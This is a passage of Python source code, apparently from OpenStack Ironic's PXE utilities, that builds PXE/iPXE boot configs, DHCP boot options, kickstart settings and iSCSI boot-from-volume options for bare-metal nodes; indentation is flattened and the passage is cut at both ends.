return os.path.join(get_ipxe_root_dir(), node_uuid, 'ks.cfg.template')
elif label == 'ks_cfg':
return os.path.join(get_ipxe_root_dir(), node_uuid, 'ks.cfg')
elif label == 'stage2':
return os.path.join(get_ipxe_root_dir(), node_uuid, 'LiveOS',
'squashfs.img')
else:
return os.path.join(root_dir, node_uuid, label)
def get_http_url_path_from_label(http_url, node_uuid, label):
"""Generate http url path to various image artifacts
This method generates http(s) urls for various image artifacts int the
webserver root. The generated urls will be added to the pxe_options dict
and used to render pxe/ipxe configuration templates.
:param http_url: URL to access the root of the webserver
:param node_uuid: the UUID of the node
:param label: Name of the image
"""
if label == 'ks_template':
return '/'.join([http_url, node_uuid, 'ks.cfg.template'])
elif label == 'ks_cfg':
return '/'.join([http_url, node_uuid, 'ks.cfg'])
elif label == 'stage2':
# we store stage2 in http_root/node_uuid/LiveOS/squashfs.img
# Specifying http://host/node_uuid as stage2 url will make anaconda
# automatically load the squashfs.img from LiveOS directory.
return '/'.join([http_url, node_uuid])
else:
return '/'.join([http_url, node_uuid, label])
def create_pxe_config(task, pxe_options, template=None, ipxe_enabled=False):
"""Generate PXE configuration file and MAC address links for it.
This method will generate the PXE configuration file for the task's
node under a directory named with the UUID of that node. For each
MAC address or DHCP IP address (port) of that node, a symlink for
the configuration file will be created under the PXE configuration
directory, so regardless of which port boots first they'll get the
same PXE configuration.
If grub2 bootloader is in use, then its configuration will be created
based on DHCP IP address in the form nn.nn.nn.nn.
:param task: A TaskManager instance.
:param pxe_options: A dictionary with the PXE configuration
parameters.
:param template: The PXE configuration template. If no template is
        given the node specific template will be used.
    :param ipxe_enabled: Default false boolean to indicate if ipxe
        is in use by the caller.
    """
LOG.debug("Building PXE config for node %s", task.node.uuid)
if template is None:
if ipxe_enabled:
template = deploy_utils.get_ipxe_config_template(task.node)
else:
template = deploy_utils.get_pxe_config_template(task.node)
_ensure_config_dirs_exist(task, ipxe_enabled)
pxe_config_file_path = get_pxe_config_file_path(
task.node.uuid,
ipxe_enabled=ipxe_enabled)
is_uefi_boot_mode = (boot_mode_utils.get_boot_mode(task.node)
== 'uefi')
uefi_with_grub = is_uefi_boot_mode and not ipxe_enabled
# grub bootloader panics with '{}' around any of its tags in its
# config file. To overcome that 'ROOT' and 'DISK_IDENTIFIER' are enclosed
# with '(' and ')' in uefi boot mode.
if uefi_with_grub:
pxe_config_root_tag = '(( ROOT ))'
pxe_config_disk_ident = '(( DISK_IDENTIFIER ))'
else:
# TODO(stendulker): We should use '(' ')' as the delimiters for all our
# config files so that we do not need special handling for each of the
# bootloaders. Should be removed once the Mitaka release starts.
pxe_config_root_tag = '{{ ROOT }}'
pxe_config_disk_ident = '{{ DISK_IDENTIFIER }}'
params = {'pxe_options': pxe_options,
'ROOT': pxe_config_root_tag,
'DISK_IDENTIFIER': pxe_config_disk_ident}
pxe_config = utils.render_template(template, params)
utils.write_to_file(pxe_config_file_path, pxe_config)
# Always write the mac addresses
_link_mac_pxe_configs(task, ipxe_enabled=ipxe_enabled)
if uefi_with_grub:
try:
_link_ip_address_pxe_configs(task, ipxe_enabled)
# NOTE(TheJulia): The IP address support will fail if the
# dhcp_provider interface is set to none. This will result
# in the MAC addresses and DHCP files being written, and
# we can remove IP address creation for the grub use.
except exception.FailedToGetIPAddressOnPort as e:
if CONF.dhcp.dhcp_provider != 'none':
with excutils.save_and_reraise_exception():
LOG.error('Unable to create boot config, IP address '
'was unable to be retrieved. %(error)s',
{'error': e})
def create_ipxe_boot_script():
"""Render the iPXE boot script into the HTTP root directory"""
boot_script = utils.render_template(
CONF.pxe.ipxe_boot_script,
{'ipxe_for_mac_uri': PXE_CFG_DIR_NAME + '/'})
bootfile_path = os.path.join(
CONF.deploy.http_root,
os.path.basename(CONF.pxe.ipxe_boot_script))
# NOTE(pas-ha) to prevent unneeded writes,
# only write to file if its content is different from required,
# which should be rather rare
if (not os.path.isfile(bootfile_path)
or not utils.file_has_content(bootfile_path, boot_script)):
utils.write_to_file(bootfile_path, boot_script)
def clean_up_pxe_config(task, ipxe_enabled=False):
"""Clean up the TFTP environment for the task's node.
:param task: A TaskManager instance.
"""
LOG.debug("Cleaning up PXE config for node %s", task.node.uuid)
is_uefi_boot_mode = (boot_mode_utils.get_boot_mode(task.node) == 'uefi')
if is_uefi_boot_mode and not ipxe_enabled:
api = dhcp_factory.DHCPFactory().provider
ip_addresses = api.get_ip_addresses(task)
for port_ip_address in ip_addresses:
try:
# Get xx.xx.xx.xx based grub config file
ip_address_path = _get_pxe_ip_address_path(port_ip_address)
except exception.InvalidIPv4Address:
continue
except exception.FailedToGetIPAddressOnPort:
continue
# Cleaning up config files created for grub2.
ironic_utils.unlink_without_raise(ip_address_path)
for port in task.ports:
client_id = port.extra.get('client-id')
# syslinux, ipxe, etc.
ironic_utils.unlink_without_raise(
_get_pxe_mac_path(port.address, client_id=client_id,
ipxe_enabled=ipxe_enabled))
        # Grub2 MAC address based configuration
for path in _get_pxe_grub_mac_path(port.address,
ipxe_enabled=ipxe_enabled):
ironic_utils.unlink_without_raise(path)
if ipxe_enabled:
utils.rmtree_without_raise(os.path.join(get_ipxe_root_dir(),
task.node.uuid))
else:
utils.rmtree_without_raise(os.path.join(get_root_dir(),
task.node.uuid))
def _dhcp_option_file_or_url(task, urlboot=False, ip_version=None):
"""Returns the appropriate file or URL.
:param task: A TaskManager object.
    :param urlboot: Boolean value, default False, indicating whether a URL
        to the boot file should be returned instead of a plain file name.
    :param ip_version: Integer representing the IP version for which DHCP
        options should be returned. Possible options are 4 and 6.
"""
try:
if task.driver.boot.ipxe_enabled:
boot_file = deploy_utils.get_ipxe_boot_file(task.node)
else:
boot_file = deploy_utils.get_pxe_boot_file(task.node)
except AttributeError:
# Support boot interfaces that lack an explicit ipxe_enabled
# attribute flag.
boot_file = deploy_utils.get_pxe_boot_file(task.node)
# NOTE(TheJulia): There are additional cases as we add new
# features, so the logic below is in the form of if/elif/elif
if not urlboot:
return boot_file
elif urlboot:
if CONF.my_ipv6 and ip_version == 6:
host = utils.wrap_ipv6(CONF.my_ipv6)
else:
host = utils.wrap_ipv6(CONF.pxe.tftp_server)
return "tftp://{host}/{boot_file}".format(host=host,
boot_file=boot_file)
def dhcp_options_for_instance(task, ipxe_enabled=False, url_boot=False,
ip_version=None):
"""Retrieves the DHCP PXE boot options.
:param task: A TaskManager instance.
:param ipxe_enabled: Default false boolean that signals if iPXE
formatting should be returned by the method
for DHCP server configuration.
:param url_boot: Default false boolean to inform the method if
a URL should be returned to boot the node.
If [pxe]ip_version is set to `6`, then this option
has no effect as url_boot form is required by DHCPv6
standards.
:param ip_version: The IP version of options to return as values
differ by IP version. Default to [pxe]ip_version.
Possible options are integers 4 or 6.
:returns: Dictionary to be sent to the networking service describing
the DHCP options to be set.
"""
if ip_version:
use_ip_version = ip_version
else:
use_ip_version = int(CONF.pxe.ip_version)
dhcp_opts = []
dhcp_provider_name = CONF.dhcp.dhcp_provider
if use_ip_version == 4:
boot_file_param = DHCP_BOOTFILE_NAME
else:
# NOTE(TheJulia): Booting with v6 means it is always
# a URL reply.
boot_file_param = DHCPV6_BOOTFILE_NAME
url_boot = True
# NOTE(TheJulia): The ip_version value config from the PXE config is
# guarded in the configuration, so there is no real sense in having
# anything else here in the event the value is something aside from
# 4 or 6, as there are no other possible values.
boot_file = _dhcp_option_file_or_url(task, url_boot, use_ip_version)
if ipxe_enabled:
# TODO(TheJulia): DHCPv6 through dnsmasq + ipxe matching simply
# does not work as the dhcp client is tracked via a different
# identity mechanism in the exchange. This means if we really
# want ipv6 + ipxe, we should be prepared to build a custom
# iso with ipxe inside. Likely this is more secure and better
# aligns with some of the mega-scale ironic operators.
script_name = os.path.basename(CONF.pxe.ipxe_boot_script)
# TODO(TheJulia): We should make this smarter to handle unwrapped v6
# addresses, since the format is http://[ff80::1]:80/boot.ipxe.
# As opposed to requiring configuration, we can eventually make this
# dynamic, and would need to do similar then.
ipxe_script_url = '/'.join([CONF.deploy.http_url, script_name])
# if the request comes from dumb firmware send them the iPXE
# boot image.
if dhcp_provider_name == 'neutron':
# Neutron use dnsmasq as default DHCP agent. Neutron carries the
# configuration to relate to the tags below. The ipxe6 tag was
# added in the Stein cycle which identifies the iPXE User-Class
# directly and is only sent in DHCPv6.
if use_ip_version != 6:
dhcp_opts.append(
{'opt_name': "tag:!ipxe,%s" % boot_file_param,
'opt_value': boot_file}
)
dhcp_opts.append(
{'opt_name': "tag:ipxe,%s" % boot_file_param,
'opt_value': ipxe_script_url}
)
else:
dhcp_opts.append(
{'opt_name': "tag:!ipxe6,%s" % boot_file_param,
'opt_value': boot_file})
dhcp_opts.append(
{'opt_name': "tag:ipxe6,%s" % boot_file_param,
'opt_value': ipxe_script_url})
else:
# !175 == non-iPXE.
# http://ipxe.org/howto/dhcpd#ipxe-specific_options
if use_ip_version == 6:
LOG.warning('IPv6 is enabled and the DHCP driver appears set '
'to a plugin aside from "neutron". Node %(name)s '
'may not receive proper DHCPv6 provided '
'boot parameters.', {'name': task.node.uuid})
# NOTE(TheJulia): This was added for ISC DHCPd support, however it
# appears that isc support was never added to neutron and is likely
# a down stream driver.
dhcp_opts.append({'opt_name': "!%s,%s" % (DHCP_IPXE_ENCAP_OPTS,
boot_file_param),
'opt_value': boot_file})
dhcp_opts.append({'opt_name': boot_file_param,
'opt_value': ipxe_script_url})
else:
dhcp_opts.append({'opt_name': boot_file_param,
'opt_value': boot_file})
# 210 == tftp server path-prefix or tftp root, will be used to find
# pxelinux.cfg directory. The pxelinux.0 loader infers this information
# from it's own path, but Petitboot needs it to be specified by this
# option since it doesn't use pxelinux.0 loader.
if not url_boot:
dhcp_opts.append(
{'opt_name': DHCP_TFTP_PATH_PREFIX,
'opt_value': get_tftp_path_prefix()})
if not url_boot:
dhcp_opts.append({'opt_name': DHCP_TFTP_SERVER_NAME,
'opt_value': CONF.pxe.tftp_server})
dhcp_opts.append({'opt_name': DHCP_TFTP_SERVER_ADDRESS,
'opt_value': CONF.pxe.tftp_server})
# NOTE(vsaienko) set this option specially for dnsmasq case as it always
# sets `siaddr` field which is treated by pxe clients as TFTP server
# see page 9 https://tools.ietf.org/html/rfc2131.
# If `server-ip-address` is not provided dnsmasq sets `siaddr` to dnsmasq's
# IP which breaks PXE booting as TFTP server is configured on ironic
# conductor host.
# http://thekelleys.org.uk/gitweb/?p=dnsmasq.git;a=blob;f=src/dhcp-common.c;h=eae9ae3567fe16eb979a484976c270396322efea;hb=a3303e196e5d304ec955c4d63afb923ade66c6e8#l572 # noqa
# There is an informational RFC which describes how options related to
# tftp 150,66 and siaddr should be used https://tools.ietf.org/html/rfc5859
# All dhcp servers we've tried: contrail/dnsmasq/isc just silently ignore
# unknown options but potentially it may blow up with others.
# Related bug was opened on Neutron side:
# https://bugs.launchpad.net/neutron/+bug/1723354
if not url_boot:
dhcp_opts.append({'opt_name': 'server-ip-address',
'opt_value': CONF.pxe.tftp_server})
# Append the IP version for all the configuration options
for opt in dhcp_opts:
opt.update({'ip_version': use_ip_version})
return dhcp_opts
def get_tftp_path_prefix():
"""Adds trailing slash (if needed) necessary for path-prefix
:return: CONF.pxe.tftp_root ensured to have a trailing slash
"""
return os.path.join(CONF.pxe.tftp_root, '')
def get_path_relative_to_tftp_root(file_path):
"""Return file relative path to CONF.pxe.tftp_root
:param file_path: full file path to be made relative path.
:returns: The path relative to CONF.pxe.tftp_root
"""
return os.path.relpath(file_path, get_tftp_path_prefix())
def is_ipxe_enabled(task):
"""Return true if ipxe is set.
:param task: A TaskManager object
:returns: boolean true if ``[pxe]ipxe_enabled`` is configured
or if the task driver instance is the iPXE driver.
"""
return 'ipxe_boot' in task.driver.boot.capabilities
def parse_driver_info(node, mode='deploy'):
"""Gets the driver specific Node deployment info.
This method validates whether the 'driver_info' property of the
supplied node contains the required information for this driver to
deploy images to, or rescue, the node.
:param node: a single Node.
:param mode: Label indicating a deploy or rescue operation being
carried out on the node. Supported values are
'deploy' and 'rescue'. Defaults to 'deploy', indicating
deploy operation is being carried out.
:returns: A dict with the driver_info values.
:raises: MissingParameterValue
"""
info = node.driver_info
params_to_check = KERNEL_RAMDISK_LABELS[mode]
d_info = {k: info.get(k) for k in params_to_check}
if not any(d_info.values()):
# NOTE(dtantsur): avoid situation when e.g. deploy_kernel comes from
# driver_info but deploy_ramdisk comes from configuration, since it's
# a sign of a potential operator's mistake.
d_info = {k: getattr(CONF.conductor, k) for k in params_to_check}
error_msg = _("Cannot validate PXE bootloader. Some parameters were"
" missing in node's driver_info and configuration")
deploy_utils.check_for_missing_params(d_info, error_msg)
return d_info
def get_instance_image_info(task, ipxe_enabled=False):
"""Generate the paths for TFTP files for instance related images.
This method generates the paths for instance kernel and
instance ramdisk. This method also updates the node, so caller should
already have a non-shared lock on the node.
:param task: A TaskManager instance containing node and context.
:param ipxe_enabled: Default false boolean to indicate if ipxe
is in use by the caller.
:returns: a dictionary whose keys are the names of the images (kernel,
ramdisk) and values are the absolute paths of them. If it's a whole
disk image or node is configured for localboot,
it returns an empty dictionary.
"""
ctx = task.context
node = task.node
image_info = {}
# NOTE(pas-ha) do not report image kernel and ramdisk for
# local boot or whole disk images so that they are not cached
if (node.driver_internal_info.get('is_whole_disk_image')
or deploy_utils.get_boot_option(node) == 'local'):
return image_info
if ipxe_enabled:
root_dir = get_ipxe_root_dir()
else:
root_dir = get_root_dir()
i_info = node.instance_info
if i_info.get('boot_iso'):
image_info['boot_iso'] = (
i_info['boot_iso'],
os.path.join(root_dir, node.uuid, 'boot_iso'))
return image_info
labels = ('kernel', 'ramdisk')
d_info = deploy_utils.get_image_instance_info(node)
if not (i_info.get('kernel') and i_info.get('ramdisk')):
glance_service = service.GlanceImageService(context=ctx)
iproperties = glance_service.show(d_info['image_source'])['properties']
for label in labels:
i_info[label] = str(iproperties[label + '_id'])
node.instance_info = i_info
node.save()
anaconda_labels = ()
if deploy_utils.get_boot_option(node) == 'kickstart':
# stage2 - Installer stage2 squashfs image
# ks_template - Anaconda kickstart template
# ks_cfg - rendered ks_template
anaconda_labels = ('stage2', 'ks_template', 'ks_cfg')
if not (i_info.get('stage2') and i_info.get('ks_template')):
iproperties = glance_service.show(
d_info['image_source']
)['properties']
for label in anaconda_labels:
# ks_template is an optional property on the image
if (label == 'ks_template'
and not iproperties.get('ks_template')):
i_info[label] = CONF.anaconda.default_ks_template
elif label == 'ks_cfg':
i_info[label] = ''
elif label == 'stage2' and 'stage2_id' not in iproperties:
msg = ("stage2_id property missing on the image. "
"The anaconda deploy interface requires stage2_id "
"property to be associated with the os image. ")
raise exception.ImageUnacceptable(msg)
else:
i_info[label] = str(iproperties['stage2_id'])
node.instance_info = i_info
node.save()
for label in labels + anaconda_labels:
image_info[label] = (
i_info[label],
get_file_path_from_label(node.uuid, root_dir, label)
)
return image_info
def get_image_info(node, mode='deploy', ipxe_enabled=False):
"""Generate the paths for TFTP files for deploy or rescue images.
This method generates the paths for the deploy (or rescue) kernel and
deploy (or rescue) ramdisk.
:param node: a node object
:param mode: Label indicating a deploy or rescue operation being
carried out on the node. Supported values are 'deploy' and 'rescue'.
Defaults to 'deploy', indicating deploy operation is being carried out.
:param ipxe_enabled: A default False boolean value to tell the method
if the caller is using iPXE.
:returns: a dictionary whose keys are the names of the images
(deploy_kernel, deploy_ramdisk, or rescue_kernel, rescue_ramdisk) and
values are the absolute paths of them.
:raises: MissingParameterValue, if deploy_kernel/deploy_ramdisk or
rescue_kernel/rescue_ramdisk is missing in node's driver_info.
"""
d_info = parse_driver_info(node, mode=mode)
return get_kernel_ramdisk_info(
node.uuid, d_info, mode=mode, ipxe_enabled=ipxe_enabled)
def build_deploy_pxe_options(task, pxe_info, mode='deploy',
ipxe_enabled=False):
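    """Build the PXE options pointing at the deploy or rescue kernel/ramdisk.

    Depending on ``ipxe_enabled`` the resulting ``deployment_aki_path`` and
    ``deployment_ari_path`` values are HTTP(S) or Swift temp URLs, or paths
    relative to the TFTP root.
    """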
pxe_opts = {}
node = task.node
kernel_label = '%s_kernel' % mode
ramdisk_label = '%s_ramdisk' % mode
for label, option in ((kernel_label, 'deployment_aki_path'),
(ramdisk_label, 'deployment_ari_path')):
if ipxe_enabled:
image_href = pxe_info[label][0]
if (CONF.pxe.ipxe_use_swift
and service_utils.is_glance_image(image_href)):
pxe_opts[option] = images.get_temp_url_for_glance_image(
task.context, image_href)
else:
pxe_opts[option] = '/'.join([CONF.deploy.http_url, node.uuid,
label])
else:
pxe_opts[option] = get_path_relative_to_tftp_root(
pxe_info[label][1])
if ipxe_enabled:
pxe_opts['initrd_filename'] = ramdisk_label
return pxe_opts
def build_instance_pxe_options(task, pxe_info, ipxe_enabled=False):
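    """Build the PXE options for the instance (user) image.

    Sets ``aki_path``/``ari_path`` for the user kernel and ramdisk, the
    anaconda ``stage2``/kickstart locations when present, optional ramdisk
    kernel arguments and, if configured, a ``boot_iso_url``.
    """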
pxe_opts = {}
node = task.node
for label, option in (('kernel', 'aki_path'),
('ramdisk', 'ari_path'),
('stage2', 'stage2_url'),
('ks_template', 'ks_template_path'),
('ks_cfg', 'ks_cfg_url')):
if label in pxe_info:
if ipxe_enabled or label in ('stage2', 'ks_template', 'ks_cfg'):
# NOTE(pas-ha) do not use Swift TempURLs for kernel and
# ramdisk of user image when boot_option is not local,
# as this breaks instance reboot later when temp urls
# have timed out.
pxe_opts[option] = get_http_url_path_from_label(
CONF.deploy.http_url, node.uuid, label)
else:
# It is possible that we don't have kernel/ramdisk or even
# image_source to determine if it's a whole disk image or not.
# For example, when transitioning to 'available' state
# for first time from 'manage' state.
pxe_opts[option] = get_path_relative_to_tftp_root(
pxe_info[label][1])
pxe_opts.setdefault('aki_path', 'no_kernel')
pxe_opts.setdefault('ari_path', 'no_ramdisk')
i_info = task.node.instance_info
try:
pxe_opts['ramdisk_opts'] = i_info['ramdisk_kernel_arguments']
except KeyError:
pass
try:
# TODO(TheJulia): Boot iso should change at a later point
# if we serve more than just as a pass-through.
if i_info.get('boot_iso'):
pxe_opts['boot_iso_url'] = '/'.join(
[CONF.deploy.http_url, node.uuid, 'boot_iso'])
except KeyError:
pass
return pxe_opts
def build_extra_pxe_options(task, ramdisk_params=None):
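    """Build PXE options shared by all boot configurations.

    Returns the assembled kernel append parameters (including IPA debug and
    global request id flags), the TFTP server address and the iPXE timeout
    in milliseconds.
    """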
pxe_append_params = driver_utils.get_kernel_append_params(
task.node, default=CONF.pxe.kernel_append_params)
# Enable debug in IPA according to CONF.debug if it was not
# specified yet
if CONF.debug and 'ipa-debug' not in pxe_append_params:
pxe_append_params += ' ipa-debug=1'
if ramdisk_params:
pxe_append_params += ' ' + ' '.join(
('%s=%s' % tpl) if tpl[1] is not None else tpl[0]
for tpl in ramdisk_params.items())
if task and task.context.global_id:
pxe_append_params += (
' ipa-global-request-id=%s' % task.context.global_id)
return {'pxe_append_params': pxe_append_params,
'tftp_server': CONF.pxe.tftp_server,
'ipxe_timeout': CONF.pxe.ipxe_timeout * 1000}
def build_pxe_config_options(task, pxe_info, service=False,
ipxe_enabled=False, ramdisk_params=None):
"""Build the PXE config options for a node
This method builds the PXE boot options for a node,
given all the required parameters.
The options should then be passed to pxe_utils.create_pxe_config to
create the actual config files.
:param task: A TaskManager object
:param pxe_info: a dict of values to set on the configuration file
:param service: if True, build "service mode" pxe config for netboot-ed
user image and skip adding deployment image kernel and ramdisk info
to PXE options.
:param ipxe_enabled: Default false boolean to indicate if ipxe
is in use by the caller.
:param ramdisk_params: the parameters to be passed to the ramdisk.
as kernel command-line arguments.
:returns: A dictionary of pxe options to be used in the pxe bootfile
template.
"""
node = task.node
mode = deploy_utils.rescue_or_deploy_mode(node)
if service:
pxe_options = {}
elif (node.driver_internal_info.get('boot_from_volume')
and ipxe_enabled):
pxe_options = get_volume_pxe_options(task)
else:
pxe_options = build_deploy_pxe_options(task, pxe_info, mode=mode,
ipxe_enabled=ipxe_enabled)
# NOTE(pas-ha) we still must always add user image kernel and ramdisk
# info as later during switching PXE config to service mode the
# template will not be regenerated anew, but instead edited as-is.
# This can be changed later if/when switching PXE config will also use
# proper templating instead of editing existing files on disk.
pxe_options.update(build_instance_pxe_options(task, pxe_info,
ipxe_enabled=ipxe_enabled))
pxe_options.update(build_extra_pxe_options(task, ramdisk_params))
return pxe_options
def build_service_pxe_config(task, instance_image_info,
root_uuid_or_disk_id,
ramdisk_boot=False,
ipxe_enabled=False,
is_whole_disk_image=None,
anaconda_boot=False):
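    """Build (if needed) and switch the PXE configuration to service mode.

    Used for takeover of ACTIVE nodes, unrescue and ramdisk/anaconda boot:
    recreates the node's PXE/iPXE configuration when it is missing and then
    switches it to boot the deployed image identified by
    ``root_uuid_or_disk_id``.
    """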
node = task.node
pxe_config_path = get_pxe_config_file_path(node.uuid,
ipxe_enabled=ipxe_enabled)
# NOTE(pas-ha) if it is takeover of ACTIVE node or node performing
# unrescue operation, first ensure that basic PXE configs and links
# are in place before switching pxe config
# NOTE(TheJulia): Also consider deploying a valid state to go ahead
# and check things before continuing, as otherwise deployments can
# fail if the agent was booted outside the direct actions of the
# boot interface.
if (node.provision_state in [states.ACTIVE, states.UNRESCUING,
states.DEPLOYING]
and not os.path.isfile(pxe_config_path)):
pxe_options = build_pxe_config_options(task, instance_image_info,
service=True,
ipxe_enabled=ipxe_enabled)
if ipxe_enabled:
pxe_config_template = deploy_utils.get_ipxe_config_template(node)
else:
pxe_config_template = deploy_utils.get_pxe_config_template(node)
create_pxe_config(task, pxe_options, pxe_config_template,
ipxe_enabled=ipxe_enabled)
if is_whole_disk_image is None:
is_whole_disk_image = node.driver_internal_info.get(
'is_whole_disk_image')
deploy_utils.switch_pxe_config(
pxe_config_path, root_uuid_or_disk_id,
boot_mode_utils.get_boot_mode(node),
is_whole_disk_image,
deploy_utils.is_trusted_boot_requested(node),
deploy_utils.is_iscsi_boot(task), ramdisk_boot,
ipxe_enabled=ipxe_enabled, anaconda_boot=anaconda_boot)
def _build_heartbeat_url(node_uuid):
api_version = 'v1'
heartbeat_api = '%s/heartbeat/{node_uuid}' % api_version
path = heartbeat_api.format(node_uuid=node_uuid)
return "/".join([deploy_utils.get_ironic_api_url(), path])
def build_kickstart_config_options(task):
"""Build the kickstart template options for a node
This method builds the kickstart template options for a node,
given all the required parameters.
The options should then be passed to pxe_utils.create_kickstart_config to
create the actual config files.
:param task: A TaskManager object
:returns: A dictionary of kickstart options to be used in the kickstart
template.
"""
ks_options = {}
node = task.node
manager_utils.add_secret_token(node, pregenerated=True)
node.save()
ks_options['liveimg_url'] = node.instance_info['image_url']
ks_options['agent_token'] = node.driver_internal_info['agent_secret_token']
ks_options['heartbeat_url'] = _build_heartbeat_url(node.uuid)
return ks_options
def get_volume_pxe_options(task):
"""Identify volume information for iPXE template generation."""
def __return_item_or_first_if_list(item):
if isinstance(item, list):
return item[0]
else:
return item
def __get_property(properties, key):
prop = __return_item_or_first_if_list(properties.get(key, ''))
if prop != '':
return prop
return __return_item_or_first_if_list(properties.get(key + 's', ''))
def __format_portal(portal, iqn, lun):
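        # e.g. __format_portal('10.0.0.5:3260', 'iqn.2004-04.example:vol1', 1)
        #   -> 'iscsi:10.0.0.5::3260:1:iqn.2004-04.example:vol1'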
if ':' in portal:
host, port = portal.split(':')
else:
host = portal
port = ''
return ("iscsi:%(host)s::%(port)s:%(lun)s:%(iqn)s" %
{'host': host, 'port': port, 'lun': lun, 'iqn': iqn})
def __generate_iscsi_url(properties):
"""Returns iscsi url."""
iqn = __get_property(properties, 'target_iqn')
lun = __get_property(properties, 'target_lun')
if 'target_portals' in properties:
portals = properties.get('target_portals')
formatted_portals = []
for portal in portals:
formatted_portals.append(__format_portal(portal, iqn, lun))
return ' '.join(formatted_portals)
else:
portal = __get_property(properties, 'target_portal')
return __format_portal(portal, iqn, lun)
pxe_options = {}
node = task.node
boot_volume = node.driver_internal_info.get('boot_from_volume')
volume = objects.VolumeTarget.get_by_uuid(task.context,
boot_volume)
properties = volume.properties
if 'iscsi' in volume['volume_type']:
if 'auth_username' in properties:
pxe_options['username'] = properties['auth_username']
if 'auth_password' in properties:
pxe_options['password'] = properties['auth_password']
iscsi_initiator_iqn = None
for vc in task.volume_connectors:
if vc.type == 'iqn':
iscsi_initiator_iqn = vc.connector_id
pxe_options.update(
{'iscsi_boot_url': __generate_iscsi_url(volume.properties),
'iscsi_initiator_iqn': iscsi_initiator_iqn})
# NOTE(TheJulia): This may be the route to multi-path, define
# volumes via sanhook in the ipxe template and let the OS sort it out.
extra_targets = []
for target in task.volume_targets:
if target.boot_index != 0 and 'iscsi' in target.volume_type:
iscsi_url = __generate_iscsi_url(target.properties)
username = target.properties['auth_username']
password = target.properties['auth_password']
extra_targets.append({'url': iscsi_url,
'username': username,
'password': password})
pxe_options.update({'iscsi_volumes': extra_targets,
'boot_from_volume': True})
# TODO(TheJulia): FibreChannel boot, i.e. wwpn in volume_type
# for FCoE, should go here.
return pxe_options
def validate_boot_parameters_for_trusted_boot(node):
"""Check if boot parameters are valid for trusted boot."""
boot_mode = boot_mode_utils.get_boot_mode(node)
boot_option = deploy_utils.get_boot_option(node)
is_whole_disk_image = node.driver_internal_info.get('is_whole_disk_image')
# 'is_whole_disk_image' is not supported by trusted boot, because there is
# no Kernel/Ramdisk to measure at all.
if (boot_mode != 'bios'
or is_whole_disk_image
or boot_option != 'netboot'):
msg = (_("Trusted boot is only supported in BIOS boot mode with "
"netboot and without whole_disk_image, but Node "
"%(node_uuid)s was configured with boot_mode: %(boot_mode)s, "
"boot_option: %(boot_option)s, is_whole_disk_image: "
"%(is_whole_disk_image)s: at least one of them is wrong, and "
"this can be caused by enable secure boot.") %
{'node_uuid': node.uuid, 'boot_mode': boot_mode,
'boot_option': boot_option,
'is_whole_disk_image': is_whole_disk_image})
LOG.error(msg)
raise exception.InvalidParameterValue(msg)
def validate_kickstart_template(ks_template):
"""Validate the kickstart template
:param ks_template: Path to the kickstart template
:raises: InvalidKickstartTemplate
"""
ks_options = {'liveimg_url': 'fake_image_url',
'agent_token': 'fake_token',
'heartbeat_url': 'fake_heartbeat_url'}
params = {'ks_options': ks_options}
try:
rendered_tmpl = utils.render_template(ks_template, params, strict=True)
except jinja2.exceptions.UndefinedError as exc:
msg = (_("The kickstart template includes a variable that is not "
"a valid kickstart option. Rendering the template returned "
" %(msg)s. The valid options are %(valid_options)s.") %
{'msg': exc.message,
'valid_options': ','.join(ks_options.keys())})
raise exception.InvalidKickstartTemplate(msg)
missing_required_options = []
for var, value in ks_options.items():
if rendered_tmpl.find(value) == -1:
missing_required_options.append(var)
if missing_required_options:
msg = (_("Following required kickstart option variables are missing "
"from the kickstart template: %(missing_opts)s.") %
{'missing_opts': ','.join(missing_required_options)})
raise exception.InvalidKickstartTemplate(msg)
return rendered_tmpl
def validate_kickstart_file(ks_cfg):
"""Check if the kickstart file is valid
:param ks_cfg: Contents of kickstart file to validate
:raises: InvalidKickstartFile
"""
if not os.path.isfile('/usr/bin/ksvalidator'):
LOG.warning(
"Unable to validate the kickstart file as ksvalidator binary is "
"missing. Please install pykickstart package to enable "
"validation of kickstart file."
)
return
with tempfile.NamedTemporaryFile(
dir=CONF.tempdir, suffix='.cfg') as ks_file:
ks_file.writelines(ks_cfg)
        try:
            utils.execute(
                'ksvalidator', ks_file.name, check_on_exit=[0], attempts=1
            )
        except processutils.ProcessExecutionError as e:
            msg = (_("The kickstart file generated does not pass validation. "
                     "The ksvalidator tool returned the following error(s): "
                     "%s") % e)
            raise exception.InvalidKickstartFile(msg)
def prepare_instance_pxe_config(task, image_info,
iscsi_boot=False,
ramdisk_boot=False,
ipxe_enabled=False,
anaconda_boot=False):
"""Prepares the config file for PXE boot
:param task: a task from TaskManager.
:param image_info: a dict of values of instance image
metadata to set on the configuration file.
:param iscsi_boot: if boot is from an iSCSI volume or not.
:param ramdisk_boot: if the boot is to a ramdisk configuration.
:param ipxe_enabled: Default false boolean to indicate if ipxe
is in use by the caller.
    :param anaconda_boot: if the boot is to an anaconda ramdisk configuration.
:returns: None
"""
node = task.node
# Generate options for both IPv4 and IPv6, and they can be
# filtered down later based upon the port options.
# TODO(TheJulia): This should be re-tooled during the Victoria
# development cycle so that we call a single method and return
# combined options. The method we currently call is relied upon
    # by two external projects, so changing the behavior is not ideal.
dhcp_opts = dhcp_options_for_instance(task, ipxe_enabled,
ip_version=4)
dhcp_opts += dhcp_options_for_instance(task, ipxe_enabled,
ip_version=6)
provider = dhcp_factory.DHCPFactory()
provider.update_dhcp(task, dhcp_opts)
pxe_config_path = get_pxe_config_file_path(
node.uuid, ipxe_enabled=ipxe_enabled)
if not os.path.isfile(pxe_config_path):
pxe_options = build_pxe_config_options(
task, image_info, service=ramdisk_boot or anaconda_boot,
ipxe_enabled=ipxe_enabled)
if ipxe_enabled:
pxe_config_template = (
deploy_utils.get_ipxe_config_template(node))
else:
pxe_config_template = (
deploy_utils.get_pxe_config_template(node))
create_pxe_config(
task, pxe_options, pxe_config_template,
ipxe_enabled=ipxe_enabled)
deploy_utils.switch_pxe_config(
pxe_config_path, None,
boot_mode_utils.get_boot_mode(node), False,
iscsi_boot=iscsi_boot, ramdisk_boot=ramdisk_boot,
ipxe_enabled=ipxe_enabled, anaconda_boot=anaconda_boot)
def prepare_instance_kickstart_config(task, image_info, anaconda_boot=False):
"""Prepare to boot anaconda ramdisk by generating kickstart file
:param task: a task from TaskManager.
:param image_info: a dict of values of instance image
metadata to set on the configuration file.
    :param anaconda_boot: if the boot is to an anaconda ramdisk configuration.
"""
if not anaconda_boot:
return
ks_options = build_kickstart_config_options(task)
kickstart_template = image_info['ks_template'][1]
ks_cfg = utils.render_template(kickstart_template, ks_options)
ks_config_drive = ks_utils.prepare_config_drive(task)
if ks_config_drive:
